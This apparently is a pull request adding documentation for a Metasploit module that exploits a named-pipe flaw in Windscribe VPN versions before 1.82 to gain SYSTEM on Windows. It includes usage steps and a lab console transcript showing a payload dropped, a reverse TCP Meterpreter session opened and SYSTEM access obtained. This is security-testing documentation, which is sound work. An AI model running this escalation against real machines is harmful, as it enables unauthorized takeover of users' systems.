### PR TITLE
Add Windscribe WindscribeService Named Pipe Privilege Escalation

### DIFF
--- a/documentation/modules/exploit/windows/local/windscribe_windscribeservice_priv_esc.md
+++ b/documentation/modules/exploit/windows/local/windscribe_windscribeservice_priv_esc.md
@@ -1,0 +1,81 @@
+## Description
+
+  The Windscribe VPN client application for Windows makes use of a
+  Windows service `WindscribeService.exe` which exposes a named pipe
+  `\\.\pipe\WindscribeService` allowing execution of programs with
+  elevated privileges.
+
+  Windscribe versions prior to 1.82 do not validate user-supplied
+  program names, allowing execution of arbitrary commands as SYSTEM.
+
+
+## Vulnerable Application
+
+  This module has been tested successfully on [Windscribe](https://windscribe.com/)
+  version 1.80 and 1.81 on Windows 7 SP1 (x64).
+
+  Download:
+
+  * https://assets.windscribe.com/desktop/win/Windscribe_1.80.exe
+  * https://assets.windscribe.com/desktop/win/Windscribe_1.81.exe
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. `use exploit/windows/local/windscribe_windscribeservice_priv_esc`
+  4. `set SESSION <SESSION>`
+  5. `check`
+  6. `run`
+  7. You should get a new *SYSTEM* session
+
+
+## Options
+
+  **SESSION**
+
+  Which session to use, which can be viewed with `sessions`
+
+  **WritableDir**
+
+  A writable directory file system path. (default: `%TEMP%`)
+
+
+## Scenarios
+
+### Windows 7 SP1 (x64)
+
+  ```
+  msf5 > use exploit/windows/local/windscribe_windscribeservice_priv_esc 
+  msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > set session 1
+  session => 1
+  msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > set verbose true
+  verbose => true
+  msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > check
+  [*] The service is running, but could not be validated.
+  msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > set lhost 172.16.191.165
+  lhost => 172.16.191.165
+  msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > run
+
+  [*] Started reverse TCP handler on 172.16.191.165:4444 
+  [*] Writing payload (283 bytes) to C:\Users\test\AppData\Local\Temp\1OOIoYHTpb.exe ...
+  [*] Sending C:\Users\test\AppData\Local\Temp\1OOIoYHTpb.exe to \\.\pipe\WindscribeService ...
+  [+] Opended \\.\pipe\WindscribeService! Proceeding ...
+  [*] Sending stage (180291 bytes) to 172.16.191.242
+  [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.242:49365) at 2020-01-31 19:14:31 -0500
+  [-] Failed to delete C:\Users\test\AppData\Local\Temp\1OOIoYHTpb.exe: stdapi_fs_delete_file: Operation failed: Access is denied.
+
+  meterpreter > getuid
+  Server username: NT AUTHORITY\SYSTEM
+  meterpreter > sysinfo
+  Computer        : TEST
+  OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
+  Architecture    : x64
+  System Language : en_US
+  Domain          : WORKGROUP
+  Logged On Users : 2
+  Meterpreter     : x86/windows
+  meterpreter >
+  ```
+


### PR DESCRIPTION
Add Windscribe WindscribeService Named Pipe Privilege Escalation

  The Windscribe VPN client application for Windows makes use of a
  Windows service `WindscribeService.exe` which exposes a named pipe
  `\\.\pipe\WindscribeService` allowing execution of programs with
  elevated privileges.

  Windscribe versions prior to 1.82 do not validate user-supplied
  program names, allowing execution of arbitrary commands as SYSTEM.
